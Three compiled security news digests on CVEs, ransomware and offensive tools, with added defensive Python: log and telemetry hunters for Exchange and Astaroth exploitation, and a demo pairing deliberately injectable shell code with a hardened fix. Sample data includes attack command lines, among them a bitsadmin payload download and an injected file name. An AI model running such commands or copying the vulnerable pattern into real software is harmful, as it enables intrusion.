Vulners weekly digest #6

This week's review is mostly about vulnerabilities being exploited in attacks across various areas. We also give examples of why security updates should not be ignored.


The most interesting vulnerabilities

If you use any of the tools or systems mentioned in this section, install the security updates.

Gitlab multiple vulnerabilities

Many companies use enterprise tools such as Jira, GitLab and Bitbucket, so these tools are a sweet target for attackers. This week a security release was published that fixes 13 vulnerabilities in GitLab:

  • Path Traversal in NuGet Package Registry, CVE-2020-12448. A malicious NuGet package can be used to read any *.nupkg file on the system.
  • OAuth Application Client Secrets Revealed, CVE-2020-10187. Any user could retrieve OAuth application client secrets after authorizing the application.
  • Update Nokogiri dependency. Security fix for CVE-2020-7595
  • Update git. Security fix for CVE-2020-11008

The official description of remaining vulnerabilities: https://about.gitlab.com/releases/2020/04/30/security-release-12-10-2-released/
These issues are fixed in the latest release; for many of them a CVE is still pending.
For one of the critical vulnerabilities, software developer William Bowling (@vakkz) received $1k (Path Traversal) + $19k (RCE) = $20k, with detailed information in his report.
Great work!

Docker

A new Metasploit module based on CVE-2019-15752 performs local privilege escalation via Docker-Credential-Wincred.exe. The exploit leverages a vulnerability in Docker Desktop Community editions prior to 2.1.0.1: from a lower-privileged session you can write a payload that is executed automatically by the Docker user at login.

Salt Bugs story

Timeline:

  • In mid-March this year, F-Secure identified two vulnerabilities, CVE-2020-11651 (authentication bypass) and CVE-2020-11652 (directory traversal), in the open-source Salt management framework. Together they allow full remote code execution as root on servers in data centers and cloud environments.
  • On April 29, SaltStack released Salt 3000.2 (and 2019.2.4 for the previous branch), in which the vulnerabilities were fixed.
  • On April 30, F-Secure published a write-up about the vulnerabilities with the following note: “We expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours.” Sounds like a challenge for any security enthusiast, doesn't it? 🙂
  • A day after this publication, attacks began on the servers of the LineageOS mobile operating system project. The developers said the attackers used the Salt vulnerabilities.
  • A few days later a popular blogging platform, Ghost, was also attacked through the Salt vulnerabilities. The platform has 2 million installations, including organizations such as NASA, Mozilla and DuckDuckGo.

F-Secure formally waited until the security updates were published, but the interval was clearly not enough for vendors to update their systems and products.
P.S. The vulnerability really is easy to exploit 😉

https://vulners.com/threatpost/THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235

https://vulners.com/thn/THN:8E401822CBD35E8E7CCE9E5DD922A70E


Tools

Sysmon v11.0 was released, with features like file delete monitoring, reduced reverse DNS lookup noise and more: https://docs.microsoft.com/en-us/sysinternals

Print-My-Shell
A reverse shell one-liner generator: a useful tool to quickly generate reverse shell commands during a CTF or other testing activity.

ROADtools
ROADtools is a framework for interacting with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool. Meet one of the first versions of BloodHound for Azure AD!


News

Ruthless ransomware, APT groups and Teams instead of ZOOM

Ransomware groups continue to target critical services

The Microsoft Detection and Response Team (DART) has published an interesting post about ransomware and tips on how to deal with it. So far, attacks have affected aid organizations, medical billing companies, manufacturing, transportation and government agencies. Ransomware attacks are not limited to critical services, however, so all organizations should watch for signs of compromise.

To gain access to target networks, recent extortion campaigns have used Internet-facing systems with the following weaknesses:

  • Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication
  • Old platforms like Windows Server 2003 or Windows Server 2008 without current security updates
  • Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
  • Citrix Application Delivery Controller (ADC) with CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510

All the ransomware was deployed in the same way and used mostly the same attack techniques. Ultimately, the specific ransom payload at the end of each attack chain was almost exclusively a stylistic choice made by the attackers.

List of active ransomware:

  • RobbinHood
  • Vatet loader
  • NetWalker
  • PonyFinal
  • Maze
  • REvil (aka Sodinokibi)
A motley crew of ransomware payloads

While only a few of these groups have gained notoriety for selling data, almost all of them have been seen viewing and exfiltrating data during these attacks, even if it has not yet been advertised or sold. It is also increasingly common that only a very short time elapses between publication of a vulnerability in a system or tool and the appearance of an exploit or PoC.
Full report with technical details:
https://vulners.com/mssecure/MSSECURE:E3C8B97294453D962741782EC959E79C

Maze Ransomware – this week’s winner

Operators of the Maze ransomware managed to become a little more famous than the others: they compromised the network of the state Bank of Costa Rica (Banco BCR) and, among other things, stole the data of 11 million bank cards.

In their press release, the hackers claim that they first gained access to the bank's network back in August 2019 but did not encrypt the data because “the probable damage could have been too much for the bank”.

Press release from Maze operators

As proof of the theft, Maze published 240 credit card numbers with the last 4 digits masked, along with their expiration dates and CVC codes:

Recently the American IT giant Cognizant, a NASDAQ-100 company, confirmed that it was hit by the Maze ransomware. Given the company's roughly $30 billion market capitalization, the ransom demanded for the data is likely to be counted not in single millions but in tens of millions of dollars.

PerSwaysion attacks

Group-IB has released a report on its investigation of a series of phishing attacks dubbed PerSwaysion.

The PerSwaysion operation lures victims with a non-malicious PDF and then uses Microsoft file-sharing services, including Sway, hence the name of the campaign. The hackers target high-level employees in the financial, legal and real estate industries. Geographical preferences: the USA, Canada, Singapore, Germany, the UK, the Netherlands and Hong Kong.

According to the researchers, several hacker groups using the same infrastructure are behind the series of attacks. Most PerSwaysion operations were orchestrated by scammers from Nigeria and South Africa using a Vue.js-based phishing kit, evidently developed by and rented from Vietnamese-speaking hackers.

Group-IB has also set up a web page where anyone can check whether their email address was compromised as part of the PerSwaysion attacks; however, only use it and enter your email if you have good reason to expect you were targeted.

Microsoft Teams

Recently there has been a lot of news about holes in the Zoom video conferencing service. But, as it turns out, its competitors are not far behind.

CyberArk researchers found that when delivering images, Microsoft Teams uses two authentication tokens, “authtoken” and “skypetoken”. The second is generated using the first, and with it you can take over the Microsoft Teams account. The “authtoken” cookie is sent to any subdomain of “teams .microsoft .com”, so it can be obtained by taking over such a subdomain, and CyberArk found two subdomains vulnerable to takeover: “aadsync-test .teams .microsoft .com” and “data-dev .teams .microsoft .com”.

According to CyberArk, they handed all the data to Microsoft, which fixed the vulnerability, including the misconfiguration of the “teams .microsoft .com” subdomains.

Vulners weekly digest #4

Your Exchange server is still a sweet target, and other vulnerabilities.
A serious boost for pentest frameworks.
Zoom continues to smoke and we continue to write about it in our digest.


EXPLOITS and vulnerabilities

“If You Can’t Patch Your Email Server, You Should Not Be Running It”

CVE-2020-0688 is becoming popular. While the flaw was fixed as part of Microsoft's February Patch Tuesday updates, researchers warned in a March advisory that unpatched servers were being exploited by APT actors. One of the latest pieces of research from Rapid7 reports that Exchange servers are still vulnerable to CVE-2020-0688. Researchers observed attackers leveraging the flaw to run system commands for reconnaissance, deploy webshell backdoors and execute fileless frameworks for post-exploitation.

The exploit code that Rapid7 researchers tested shows up in the Windows Application event log with source MSExchange Control Panel, level Error, and event ID 4. This log entry includes the compromised user account and a long error message containing the text Invalid viewstate.

You can also review your IIS logs for requests to a path under /ecp (usually /ecp/default.aspx) that contain the strings __VIEWSTATE and __VIEWSTATEGENERATOR. The long string in the middle of such a request, as with the Windows event log entry above, is a portion of the exploit payload. The username of the compromised account appears at the end of the log entry.
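As an added example (not Rapid7's code, nor the digest's own), the Python script below applies both checks to constructed sample data: it parses IIS W3C log lines, flags requests under /ecp whose query string carries __VIEWSTATE and __VIEWSTATEGENERATOR, and matches the MSExchange Control Panel event described above. The log lines, the event record and its message layout are constructed assumptions; the IIS field order is taken from the #Fields header rather than hard-coded.

```python
"""Hunt for CVE-2020-0688 exploitation attempts in Exchange IIS logs and the
Application event log.

Added example for this digest, not Rapid7's code. The log lines and the event
record below are constructed; the IIS field order is read from the #Fields
header rather than assumed, and the event message layout is an assumption.
"""
import re
from typing import Dict, Iterator, List, Optional
from urllib.parse import unquote

# Constructed IIS W3C extended log excerpt. B97B4E27 is the well-known
# __VIEWSTATEGENERATOR value of /ecp/default.aspx that public exploits use.
SAMPLE_IIS_LOG = r"""
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2020-04-20 10:01:12 10.0.0.5 GET /owa/ - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200
2020-04-20 10:02:33 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAMAgAAAE5TeXN0ZW0u 443 CORP\j.doe 203.0.113.7 python-requests/2.23.0 500
2020-04-20 10:03:01 10.0.0.5 POST /ecp/default.aspx - 443 CORP\admin 10.0.0.22 Mozilla/5.0+(Windows+NT+10.0) 200
"""

# Constructed event record in the shape described above (source, level, ID 4,
# "Invalid viewstate"); the exact message wording is an assumption.
SAMPLE_EVENT = {
    "Source": "MSExchange Control Panel",
    "Level": "Error",
    "EventID": 4,
    "Message": "Current user: 'CORP\\j.doe'\n"
               "Request for URL 'https://mail.example.test/ecp/default.aspx' failed: "
               "System.Web.HttpException (0x80004005): Invalid viewstate.",
}


def parse_iis_w3c(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields: List[str] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]     # header can change mid-file after an IIS restart
            continue
        if line.startswith("#"):
            continue                      # #Software / #Version / #Date headers
        values = line.split()             # IIS writes '+' for spaces inside a field
        if not fields or len(values) != len(fields):
            continue                      # truncated or foreign line: skip, don't mis-assign columns
        yield dict(zip(fields, values))


VIEWSTATE_RE = re.compile(r"__VIEWSTATE=([^&]*)", re.IGNORECASE)
GENERATOR_RE = re.compile(r"__VIEWSTATEGENERATOR=", re.IGNORECASE)


def find_ecp_viewstate_requests(log_text: str) -> List[Dict[str, str]]:
    """Requests under /ecp carrying __VIEWSTATE and __VIEWSTATEGENERATOR in the query string.

    A genuine ECP page posts its viewstate in the request body, so a viewstate in
    the query string of a request to /ecp is itself suspicious; the public exploit
    sends exactly that, with the serialized gadget chain as the __VIEWSTATE value.
    """
    hits: List[Dict[str, str]] = []
    for rec in parse_iis_w3c(log_text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        if not stem.lower().startswith("/ecp"):
            continue
        vs = VIEWSTATE_RE.search(query)
        if vs is None or GENERATOR_RE.search(query) is None:
            continue
        hits.append({
            "time": f"{rec.get('date', '')} {rec.get('time', '')}",
            "client_ip": rec.get("c-ip", ""),
            "username": rec.get("cs-username", ""),   # the compromised account
            "status": rec.get("sc-status", ""),
            "uri": stem,
            "viewstate_length": str(len(unquote(vs.group(1)))),
        })
    return hits


def is_cve_2020_0688_event(event: Dict[str, object]) -> bool:
    """True for the Application-log entry described above: MSExchange Control Panel, Error, ID 4, 'Invalid viewstate'."""
    return (
        event.get("Source") == "MSExchange Control Panel"
        and event.get("Level") == "Error"
        and event.get("EventID") == 4
        and "invalid viewstate" in str(event.get("Message", "")).lower()
    )


def event_compromised_user(event: Dict[str, object]) -> Optional[str]:
    """Pull the account name out of the message (assumes a "Current user: '...'" prefix)."""
    if not is_cve_2020_0688_event(event):
        return None
    m = re.search(r"Current user: '([^']+)'", str(event.get("Message", "")))
    return m.group(1) if m else None


if __name__ == "__main__":
    for hit in find_ecp_viewstate_requests(SAMPLE_IIS_LOG):
        print("IIS:", hit)
    print("Event log:", is_cve_2020_0688_event(SAMPLE_EVENT), event_compromised_user(SAMPLE_EVENT))
```

Run it against real logs by replacing SAMPLE_IIS_LOG with the contents of the Exchange front-end W3C log; a hit with a 500 status is an exploit attempt, a 200 with a long viewstate deserves an immediate look at the account named in cs-username.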

The update for CVE-2020-0688 should be installed on every Exchange server.

https://vulners.com/threatpost/THREATPOST:DF7C78725F19B2637603E423E56656D4

Video: https://youtu.be/7d_HoQ0LVy8

Vesta Control Panel Authenticated RCE

The vulnerability (CVE-2020-10808) was disclosed and fixed in late April, and at the same time a pull request was created in the Metasploit repo. Vesta Control Panel (VestaCP) is one of the most popular, simple and convenient panels for managing websites. VestaCP through 0.9.8-26 allows command injection via the schedule/backup Backup Listing endpoint.
The point is that an authenticated attacker with low privileges can inject a payload via a file name that starts with a dot.

More detailed technical description with video POC: https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis
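As an added illustration of the bug class (Python written for this digest, not VestaCP's own PHP and shell code), here is a backup-listing routine that splices an attacker-controlled file name into a shell command, beside a hardened version that validates the name against an allowlist and passes it as an argv element so no shell ever parses it. The malicious name, whose payload only echoes a marker, and the directory paths are constructed for the example.

```python
"""Command injection through a file name: the bug class behind CVE-2020-10808.

Added example for this digest. This is a Python illustration of the pattern,
not VestaCP's own PHP and shell code: a backup-listing routine that splices a
file name into a shell command string, next to a hardened version. The
attacker-controlled name below is constructed; its payload only echoes a marker.
"""
import os
import re
import subprocess
import tempfile
from typing import List

# Constructed malicious backup name. The page notes Vesta's payload had to live in a
# name starting with a dot; what does the damage is the quote and the ';'.
EVIL_NAME = ".x'; echo INJECTED; echo '"


def build_listing_command_vulnerable(backup_dir: str, name: str) -> str:
    """Vulnerable: the name is interpolated into one shell string, so a quote
    and ';' inside it terminate the argument and start a new command."""
    return f"ls -la '{backup_dir}/{name}'"


def run_vulnerable(backup_dir: str, name: str) -> str:
    """Runs the string through /bin/sh, exactly what shell=True (or PHP exec()) does."""
    cmd = build_listing_command_vulnerable(backup_dir, name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Allowlist, not denylist: first char alphanumeric (rejects hidden dot-files and
# '-'-prefixed names that would be parsed as options), then a conservative set.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def is_safe_backup_name(name: str) -> bool:
    return bool(SAFE_NAME_RE.match(name))


def build_listing_command_hardened(backup_dir: str, name: str) -> List[str]:
    """Hardened: validate, then build an argv list so no shell parses the name at all."""
    if not is_safe_backup_name(name):
        raise ValueError(f"rejected backup name: {name!r}")
    return ["ls", "-la", "--", os.path.join(backup_dir, name)]


def run_hardened(backup_dir: str, name: str) -> str:
    argv = build_listing_command_hardened(backup_dir, name)
    return subprocess.run(argv, capture_output=True, text=True).stdout   # shell=False is the default


def hardened_rejects(name: str) -> bool:
    """True when the hardened path refuses the name before anything is executed."""
    try:
        build_listing_command_hardened("/var/backups", name)
    except ValueError:
        return True
    return False


def demo_hardened() -> str:
    """List a real (temporary) backup dir with a legitimate name through the hardened path."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "user-2020-04-20.tar"), "w").close()
        return run_hardened(d, "user-2020-04-20.tar")


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable("/var/backups", EVIL_NAME))   # the marker is printed by the injected command
    print("hardened rejects evil name:", hardened_rejects(EVIL_NAME))
    print("hardened listing:", demo_hardened())
```

The allowlist is deliberately stricter than "no shell metacharacters": rejecting a leading dot or dash also stops hidden files and option injection (`-rf`), which a denylist of quotes and semicolons would let through.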

LimeSurvey CVE-2020-11456

LimeSurvey is a simple open-source tool that you install on your own server to build surveys from custom templates, using formatted text with image/video integration. LimeSurvey before 4.1.12+200324 has stored XSS in application/views/admin/surveysgroups/surveySettings.php and application/models/SurveysGroups.php.

PoC: https://vulners.com/exploitdb/EDB-ID:48289


Tools

GitHound

GitHound v1.1 helps to find sensitive information across all of GitHub, uploaded by any user. According to the author, this tool helped him earn money 🙂 A cool tool for bug bounty hunters.

SSHPry

What if we had a tool that could show us the terminal of an active SSH connection? And... maybe... control it? Record it? Investigate?

The author of SSHPry 2.0 implemented a technique to capture ALL read() strings of a connected SSH client; the SSHPry.py script mirrors the terminal of the connected SSH client.

Main features:

  • Control of target’s TTY
  • Built-In Keylogger
  • Console-Level phishing
  • Record & Replay previous sessions

The video shows the tool's functionality better:

Ps-Tools

Have you ever needed a tool like Process Explorer in your shell session? Ps-Tools provides exactly that. Why use it if the same thing can be done through PowerShell? Because PowerShell is now under heavy security monitoring. The authors mention only Cobalt Strike in their research, but you can use it in any framework, for example to detect security solutions (AV, EDR, etc.), collect more detailed information about the compromised system, or find more opportunities for lateral movement.

This functionality helps you better understand the target's systems and IT infrastructure, and periodically polling this information allows a red team to react to possible changes in the IT environment (an investigation being triggered, for example). Purple teams should test it to develop new detection rules. Expect this new functionality to be used in the most advanced penetration tests.


Dangerous remote work

Due to the pandemic, many organizations have started working remotely. In response, APT groups have increased their activity through phishing and spear-phishing using the COVID-19 context, and through attempts to exploit zero-day vulnerabilities in many remote-work tools: video conferencing, VPNs, remote access tools and so on.

An April analysis from Kaspersky uncovered a total of 120,000 suspicious malware and adware packages in the wild masquerading as versions of the Skype video calling app. Among a further 1,300 suspicious files not using the Skype name, 42 percent were disguised as Zoom, followed by WebEx (22 percent), GoToMeeting (13 percent), Flock (11 percent) and Slack (11 percent).

https://vulners.com/threatpost/THREATPOST:F3563336B135A1D7C1251AE54FDC6286

Example: Cisco ‘Critical Update’ Phishing Attack Steals Webex Credentials

The lure refers to CVE-2016-9223, a legitimate vulnerability in Cisco CloudCenter Orchestrator Docker Engine, Cisco's management tool for applications in multiple data-center, private-cloud and public-cloud environments. This critical flaw allowed unauthenticated remote attackers to install Docker containers with high privileges on affected systems. However, the vulnerability was fixed in the Cisco CloudCenter Orchestrator 4.6.2 patch release, back in 2016.

Zoom, are you OK?

Zoom is still the focus of a lot of news. Researchers have uncovered a database shared on an underground forum containing more than 2,300 compromised Zoom credentials. Compromised Zoom credentials could give cybercriminals access to web conference calls.

Attackers can join a meeting and blast music or videos to disrupt it. This practice, called “Zoom bombing,” has spiked over the past few weeks, despite the FBI cracking down on it and warning that those who take part could face jail time.

https://vulners.com/threatpost/THREATPOST:2FA23249E9EBD512847353C7FFC62505

Researchers warn users to stay on the lookout for bad actors spoofing web conferencing and virtual collaboration apps. In general, attackers are taking advantage of the panic around the coronavirus with phishing emails around financial relief, promises of a cure and symptom information details.

Vulners weekly digest #2

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security


EXPLOITS and vulnerabilities

Microsoft continues to attract most of the hype about critical vulnerabilities.
On March 23 Microsoft released a new warning about two critical zero-day vulnerabilities that could allow attackers to remotely gain control over target computers. Both are in the Windows Adobe Type Manager Library, a font parsing library that not only parses content in third-party software but is also used by Explorer to display the contents of a file in the ‘Preview Pane’ or ‘Details Pane’ without the user opening it.
25 March: according to Microsoft, the risk for Windows 10 is low.
From all the descriptions and reviews we can conclude that the real-world exploitation rate is fairly low. But you should not wait for such information to appear in APT reports or in a public exploit database.

“Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month.”

Main description from Microsoft:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006

SharePoint

A new Metasploit module was added for CVE-2020-0646. It gives an attacker remote code execution by sending specially crafted XOML data to SharePoint via the Workflows functionality.

https://vulners.com/zdt/1337DAY-ID-34152

OSX Privilege Escalation

A vulnerability was found in VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x before 11.0.1) and Horizon Client for Mac (5.x before 5.4.0). Exploiting it lets an attacker escalate from normal user privileges to root on the host. It is worth noting that exploits for macOS are quite rare, and a new Metasploit module is already on the way.

PoC: https://vulners.com/zdt/1337DAY-ID-34121
Forthcoming module: https://github.com/rapid7/metasploit-framework/pull/13123

There are also exploits without any public score or CVE number. The Vulners platform collects and aggregates information and assigns its own AI score, made up of various indicators. This way you can find a lot of information about unique vulnerabilities for which new exploits have been released (including paid ones) that were not mentioned in the news and for which no research has been published. Look at the examples below:

BustaBit

Bustabit is a simple real-time game where you can play for fun or to win money. In each round you have the opportunity to place a bet before the round starts. Every tick in the game has a chance to bust; if you don't cash out before the bust, you lose your bet.
This exploit generates the next 10 game results after starting from your . The author of the paid exploit provides a video PoC of this functionality.

https://vulners.com/zdt/1337DAY-ID-34134

360 Security sandbox escape

Many security vendors provide their own sandboxes. A sandbox is a good way to test malicious samples in an isolated environment: an application running in the sandbox has limited access, without network communication, file creation and so on. A vulnerability in the 360 Security sandbox bypasses the main sandbox features and allows an attacker to escape from the sandbox and call other programs, or another instance of itself, outside the sandbox.

https://vulners.com/zdt/1337DAY-ID-34125


INFOSEC TOOLS

Starkiller

Empire is one of the most famous pentest frameworks. Starkiller is a frontend for PowerShell Empire written in Vue.js. It is a nice addition to Empire.

uDork – Google Hacking Tool

uDork is a Python script that uses advanced Google search methods. This recon tool uses open lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database).

Ninja c2

An open-source C2 server created by a purple team for purple teams. It is especially relevant for testing your correlation rules and threat hunting techniques. Ninja is still in beta; when the stable version is released it will contain many more stealthy techniques and anti-forensic methods.

Useful C2 matrix: https://www.thec2matrix.com/matrix


Attack news

Spyware On iPhones

A new watering-hole campaign, discovered on January 10, 2020, uses a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The campaign posted malicious links on multiple forums, as clickbait news or as news about the pandemic/COVID-19.
The chain exploits a Safari (WebKit) vulnerability which, when the page is rendered in the browser, leads to exploitation of a “silently patched” use-after-free kernel flaw (tracked as CVE-2019-8605) that gives the attacker code execution with root privileges, used to install the proprietary LightSpy backdoor. The bug was resolved with the release of iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3 and watchOS 5.2.1.

By analyzing changes in the first-stage WebKit exploit, Kaspersky discovered that the list of supported devices had also been significantly extended.

The most complete diagram of the described activity, from Trend Micro:

In addition, LightSpy targets messaging applications like Telegram, QQ, and WeChat to steal account information, contacts, groups, messages, and attached files.

Astaroth come back

Astaroth is information-stealing malware that came back in early February with a lot of changes in its functionality. It uses multiple fileless techniques and abuses different legitimate processes to try to run undetected on compromised machines.
Microsoft Defender ATP data showing revival of Astaroth campaigns:

Astaroth now completely avoids the use of WMIC and related techniques to bypass existing detection methods. The attackers introduced new techniques that make the attack chain stealthier:

  • Abusing Alternate Data Streams (ADS) to hide malicious payloads
  • Abusing the legitimate process ExtExport.exe, a highly uncommon attack vector, to load the payload

One of the most significant updates is the use of Alternate Data Streams (ADS), which Astaroth abuses at several stages for various activities. An ADS is an NTFS file attribute that allows a user to attach data to an existing file. The stream data and its size are not visible in File Explorer, so attackers abuse this feature to hide malicious code in plain sight.
There is a more practical description in the research.

  1. Arrival: spear-phishing with an LNK file. When clicked, the LNK file runs an obfuscated BAT command line. The BAT drops a single-line JavaScript file to the Pictures folder and invokes explorer.exe to run it. The dropped one-liner uses the GetObject technique to fetch and run the much larger main JavaScript directly in memory.
  2. BITSAdmin abuse: the main script uses BITSAdmin to download additional binaries from the command-and-control (C2) server.
  3. Alternate Data Streams abuse: Astaroth copies the downloaded data into data streams. For each download, the content is copied to an ADS and the original file is deleted.
  4. ExtExport.exe abuse: the script uses another non-obvious technique from the LOLBAS project, ExtExport.exe, to load the payload.
  5. Userinit.exe abuse.
  6. Astaroth payload: while running, the Astaroth payload reads and decrypts more components from the ADS stream of desktop.ini.
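As an added hunting example (written for this digest, not Microsoft's detection logic), the Python below runs one rule per stage of the chain above over constructed process-creation records in the shape of Sysmon Event ID 1 / EDR telemetry: explorer.exe launching a script file, a BITSAdmin download from a URL, a write to an alternate data stream, ExtExport.exe execution, and userinit.exe started by something other than winlogon.exe. The field names, the sample command lines and the userinit parent heuristic are assumptions; a host is reported only when several stages fire together, since any single one is noisy on its own.

```python
"""Hunt for the Astaroth LOLBAS chain above in process-creation telemetry.

Added example for this digest, not Microsoft's detection logic. The records
below are constructed in the shape of Sysmon Event ID 1 / EDR process-creation
events (host, parent image, image, command line); the field names and the
"userinit not spawned by winlogon" heuristic are assumptions.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

SAMPLE_EVENTS: List[Event] = [
    # WS01 shows the chain: explorer.exe runs a .js dropped in Pictures ...
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\explorer.exe",
     "cmdline": r'explorer.exe "C:\Users\alice\Pictures\Tw2h8.js"'},
    # ... BITSAdmin fetches the next stage from the C2 ...
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer fq2 /priority foreground https://203.0.113.9/st/v1.gif C:\Users\Public\Libraries\log.gif"},
    # ... the download is copied into an ADS of desktop.ini and the original deleted ...
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c type C:\Users\Public\Libraries\log.gif > C:\Users\Public\Libraries\desktop.ini:v1 & del C:\Users\Public\Libraries\log.gif"},
    # ... ExtExport.exe loads the payload from a directory it is pointed at ...
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Program Files\Internet Explorer\ExtExport.exe",
     "cmdline": r"ExtExport.exe C:\Users\Public\Libraries\Tw2h8 a b"},
    # ... and userinit.exe is started by something other than winlogon.exe.
    {"host": "WS01", "parent": r"C:\Users\Public\Libraries\Tw2h8\Tw2h8.exe", "image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "userinit.exe"},
    # WS02: benign activity that must stay quiet (a normal logon and a text file).
    {"host": "WS02", "parent": r"C:\Windows\System32\winlogon.exe", "image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "userinit.exe"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\Documents\notes.txt"},
]


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# A stream name after a file name inside a Windows path, e.g. \desktop.ini:v1.
# Drive letters (C:\) and URLs (https://host:443) have no ".ext:" before the colon, so they do not match.
ADS_RE = re.compile(r"\\[^\\\s:\"']+\.[A-Za-z0-9]+:[A-Za-z0-9_.-]+")
SCRIPT_RE = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("explorer_launches_script",
     lambda e: _exe(e["image"]) == "explorer.exe" and SCRIPT_RE.search(e["cmdline"]) is not None),
    ("bitsadmin_download",
     lambda e: _exe(e["image"]) == "bitsadmin.exe" and "/transfer" in e["cmdline"].lower()
     and URL_RE.search(e["cmdline"]) is not None),
    ("ads_write",
     lambda e: ADS_RE.search(e["cmdline"]) is not None),
    ("extexport_execution",
     lambda e: _exe(e["image"]) == "extexport.exe"),
    ("userinit_odd_parent",   # assumption: legitimate userinit.exe is spawned by winlogon.exe
     lambda e: _exe(e["image"]) == "userinit.exe" and _exe(e["parent"]) != "winlogon.exe"),
]


def hunt(events: List[Event]) -> List[Tuple[str, str, str]]:
    """(host, rule, cmdline) for every event that trips a rule."""
    return [(e["host"], name, e["cmdline"]) for e in events for name, pred in RULES if pred(e)]


def hosts_with_chain(events: List[Event], min_rules: int = 2) -> Dict[str, List[str]]:
    """Hosts where at least min_rules distinct stages fired: one hit is noise, a combination is the chain."""
    per_host: Dict[str, List[str]] = {}
    for host, rule, _ in hunt(events):
        rules = per_host.setdefault(host, [])
        if rule not in rules:
            rules.append(rule)
    return {h: r for h, r in per_host.items() if len(r) >= min_rules}


if __name__ == "__main__":
    for host, rule, cmdline in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmdline}")
    print("hosts with the chain:", hosts_with_chain(SAMPLE_EVENTS))
```

The ADS regex is the part worth reusing on its own: a `file.ext:stream` token inside a path in any command line (copy, type, echo, powershell Set-Content -Stream) is rare enough in normal telemetry that it is a good standalone hunt, and Sysmon v11's file stream events (mentioned above) give the same signal from the file system side.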

Some of the payload components are credential-stealing plugins hidden inside the ADS stream of desktop.ini. Astaroth abuses these plugins to steal information from compromised systems:

  • NirSoft’s MailPassView – an email client password recovery tool
  • NirSoft’s WebBrowserPassView – a web browser password recovery tool

NirSoft tools are well known to many threat hunters. If you have not already done so, be sure to test and explore their capabilities.
Astaroth attempts to detect installed security products and then tries to disable them.